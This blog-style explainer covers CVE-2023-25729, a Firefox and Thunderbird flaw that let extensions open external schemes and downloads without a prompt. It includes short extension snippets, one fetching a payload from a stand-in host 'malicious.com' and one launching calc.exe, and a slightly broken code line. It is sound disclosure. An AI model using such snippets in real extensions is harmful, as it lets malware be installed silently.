In early 2023, a serious security vulnerability was found in Mozilla Firefox, Firefox ESR, and Thunderbird. Known as CVE-2023-25729, the flaw allowed web extensions to open external applications and download files without the usual user consent prompts. In this post, you'll understand how it worked, see real code examples, learn which versions were affected, and explore how attackers could have exploited it.
What Exactly Was the Problem?
Normally, when a website or browser extension tries to open something outside the browser — like another installed program (what’s called an *external scheme*, for example, launching Skype or a mail client), Firefox will show a permission prompt asking if you’re sure.
But CVE-2023-25729 bypassed that! The permission prompt only appeared for ContentPrincipals (regular web pages). But extensions, by using ExpandedPrincipals, got around this and could open any external scheme they wanted, with no interaction from you. This meant:
Understanding the Flaw
Firefox applies different security rules based on how "privileged" a script or extension is. Normal websites run as "ContentPrincipals" and are tightly controlled. Extensions, however, often use "ExpandedPrincipals", which have more authority.
The permission prompt for opening external schemes (like skype:, mailto:, even file: downloads) was only enforced for ContentPrincipals.
Here’s How You Might See This in Pseudocode
// Normal website - triggers a prompt
window.location = "mailto:test@example.com"; // Shows a prompt
// Extension with ExpandedPrincipal - NO prompt!
browser.tabs.create({ url: "skype:username?call" }); // Opens Skype directly!
Exploit Scenario
A malicious extension could use a simple command to launch an external program — or silently initiate a download.
Example: Forcing a Download
// Runs in an extension's background script (EXPANDED principal)
browser.tabs.create({ url: "file:///C:/Windows/System32/calc.exe" });
// Or open a path to silently download a payload
browser.tabs.create({ url: "http://malicious.com/payload.exe"; });
No prompt, the download starts or the app launches immediately.
Example: Triggering Installed Software
// Open external app (e.g., a vulnerable chat client)
browser.tabs.create({ url: "skype:live:user?chat" });
// Malicious payload could be sent via Skype
Real-World Impact
If you installed a malicious Firefox or Thunderbird extension (or one that was compromised), it could:
Open dangerous links or start downloads in the background
- Launch software installed on your device, sometimes with arguments (remote code execution possibilities)
Trigger other flaws in your installed apps
Combined with social engineering — for example, tricking a user into installing a "cool" extension — this could mean instant compromise of your system without any warning.
Original References
- Mozilla Security Advisory 2023-08
- Bugzilla Report #1817997
- NIST CVE Record CVE-2023-25729
How It Was Fixed
Mozilla fixed the vulnerability by ensuring ExpandedPrincipals are not exempt from permission prompts. Now, all attempts to open external schemes — even from extensions — prompt the user for confirmation.
Chrome (chromium-based browsers) comparison
Chrome, by design, blocks most external scheme launches from extensions unless the user directly initiates the action (like clicking a button).
Are You Affected? What Should You Do?
- Update Firefox, ESR, or Thunderbird to the latest version (at least Firefox 110, Thunderbird 102.8)
Conclusion
CVE-2023-25729 is a powerful reminder: extensions are just as dangerous as regular websites, sometimes more so. Always vet what you install in your browser or email client! Keep your software up to date and stay alert for security advisories.
Stay Secure!
For more details, check the official Mozilla advisory.
Timeline
Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/08/2023 14:03:00 UTC